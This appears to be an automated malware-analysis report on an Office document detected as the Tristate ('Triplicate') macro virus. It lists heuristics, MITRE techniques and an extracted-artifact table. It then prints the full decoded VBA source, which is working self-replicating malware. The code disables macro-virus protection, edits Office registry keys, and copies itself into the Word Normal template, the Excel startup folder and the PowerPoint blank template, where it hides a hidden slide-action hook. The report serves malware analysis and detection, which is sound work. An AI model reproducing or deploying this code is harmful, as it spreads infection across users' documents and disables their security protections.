MALICIOUS
322
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros that attempt to disable macro virus protection and replicate their code to the Excel startup folder, indicating an attempt to establish persistence. The script also attempts to write to registry keys related to Excel startup settings. The embedded URL is likely part of the lure or a secondary payload delivery mechanism.
Heuristics 7
-
ClamAV: Doc.Trojan.Tristate-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Tristate-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
On Error Resume Next Options.VirusProtection = False Options.ConfirmConversions = False -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
nt.InsertLines 1, ad.Lines(1, ad.CountofLines) Set xlApp = CreateObject("Excel.Application") If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then Set WordObj = GetObject(, "Word.Application") If WordObj = "" Then -
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCEThe macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.Matched line in script
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, nt.Lines(1, nt.CountofLines) Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1." Book1Obj.Close -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.yusmany.com In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9246 bytes |
SHA-256: dc8a1703fe090b4047c73221cce0a84a5352e174c04fcc86b2326907a78e4540 |
|||
|
Detection
ClamAV:
Doc.Trojan.Tristate-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'<!--1nternal-->
'Triplicate v0.21 /1nternal
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Set nt = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
Set ad = ActiveDocument.VBProject.VBComponents(1).CodeModule
If ad.Lines(1, 1) <> "'<!--1nternal-->" Then
ad.DeleteLines 1, ad.CountofLines
ad.InsertLines 1, TT.Lines(1, TT.CountofLines)
If ad.Lines(1, 1) <> "'<!--1nternal-->" Then
ad.InsertLines 1, nt.Lines(1, nt.CountofLines)
End If
End If
If nt.Lines(1, 1) <> "'<!--1nternal-->" Then
nt.DeleteLines 1, nt.CountofLines
nt.InsertLines 1, ad.Lines(1, ad.CountofLines)
Set xlApp = CreateObject("Excel.Application")
If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Check"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Whoa"
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, nt.Lines(1, nt.CountofLines)
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Book1Obj.Close
End If
xlApp.Quit
Set PPObj = CreateObject("PowerPoint.Application")
Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
For Each ModComponent In PBT.VBProject.VBComponents
If ModComponent.Name = "Triplicate" Then dontadd = True
Next
If dontadd <> True Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\PowerPoint\Options", "MacroVirusProtection") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
Set NewMod = PBT.VBProject.VBComponents.Add(1)
NewMod.Name = "Triplicate"
NewMod.CodeModule.InsertLines 1, nt.Lines(1, nt.CountofLines)
NewMod.CodeModule.ReplaceLine 118, "Sub actionhook(tristate)"
Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
With ShapetoWack
.Name = "Triplicate"
.ZOrder (1)
.Line.Visible = False
.Fill.Visible = False
.ActionSettings(1).Action = 8
.ActionSettings(1).Run = "actionhook"
End With
Set NewMod = Nothing
PBT.Save
End If
PBT.Close
PPObj.Quit
End If
If TT.Lines(1, 1) <> "'<!--1nternal-->" Then
TT.DeleteLines 1, TT.CountofLines
TT.InsertLines 1, nt.Lines(1, nt.CountofLines)
End If
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set TW = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
WQuit = True
End If
Set nt = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
WordObj.Options.SaveNormalPrompt = False
nt.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) + TW.Lines(23, 3) + Chr(13) + Chr(10) + TW.Lines(38, 3) + Chr(13) + Chr(10) + "End Sub"
WordObj.Run "Normal.ThisDocument.DisableAV"
nt.DeleteLines 1, nt.CountofLines
nt.InsertLines 1, TW.Lines(1, TW.CountofLines)
Set nt = Nothing
If WQuit = True Then WordObj.Quit
Set PPObj = CreateObject("PowerPoint.Application")
Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
For Each ModComponent In PBT.VBProject.VBComponents
If ModComponent.Name = "Triplicate" Then dontadd = True
Next
If dontadd <> True Then
Set NewMod = PBT.VBProject.VBComponents.Add(1)
NewMod.Name = "Triplicate"
NewMod.CodeModule.InsertLines 1, TW.Lines(1, TW.CountofLines)
NewMod.CodeModule.ReplaceLine 118, "Sub actionhook(tristate)"
Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
With ShapetoWack
.Name = "Triplicate"
.ZOrder (1)
.Line.Visible = False
.Fill.Visible = False
.ActionSettings(1).Action = 8
.ActionSettings(1).Run = "actionhook"
End With
Set NewMod = Nothing
PBT.Save
End If
PBT.Close
PPObj.Quit
Set xlApp = CreateObject("Excel.Application")
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, TW.Lines(1, TW.CountofLines)
Book1Obj.SaveAs FileName:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
Book1Obj.Close
xlApp.Quit
End If
If AW.Lines(1, 1) <> "'<!--1nternal-->" Then
AW.InsertLines 1, TW.Lines(1, TW.CountofLines)
End If
End Sub
Private Sub actionhook(tristate)
On Error Resume Next
If Int(Rnd * 7) = 0 Then
Set Home = ActivePresentation
If UCase(Dir(Application.Path + "\Xlstart\Book1.")) <> UCase("BOOK1") Then
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
WQuit = True
End If
Set nt = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
WordObj.Options.SaveNormalPrompt = False
nt.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) + Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(23, 3) + Chr(13) + Chr(10) + Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(38, 3) + Chr(13) + Chr(10) + "End Sub"
WordObj.Run "Normal.ThisDocument.DisableAV"
nt.DeleteLines 1, nt.CountofLines
nt.InsertLines 1, Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(1, Home.VBProject.VBComponents("Triplicate").CodeModule.CountofLines)
nt.ReplaceLine 118, "Private Sub actionhook(tristate)"
Set nt = Nothing
If WQuit = True Then WordObj.Quit
Set xlApp = CreateObject("Excel.Application")
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(1, Home.VBProject.VBComponents("Triplicate").CodeModule.CountofLines)
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.ReplaceLine 118, "Private Sub actionhook(tristate)"
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Book1Obj.Close
xlApp.Quit
Set PBT = Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
dontadd = False
For Each ModComponent In PBT.VBProject.VBComponents
If ModComponent.Name = "Triplicate" Then dontadd = True
Next
If dontadd <> True Then
Set NewMod = PBT.VBProject.VBComponents.Add(1)
NewMod.Name = "Triplicate"
NewMod.CodeModule.InsertLines 1, Home.VBProject.VBComponents("Triplicate").CodeModule.Lines(1, Home.VBProject.VBComponents("Triplicate").CodeModule.CountofLines)
Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
With ShapetoWack
.Name = "Triplicate"
.ZOrder (1)
.Line.Visible = False
.Fill.Visible = False
.ActionSettings(1).Action = 8
.ActionSettings(1).Run = "actionhook"
End With
PBT.Save
End If
PBT.Close
End If
End If
ActivePresentation.SlideShowWindow.View.Next
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.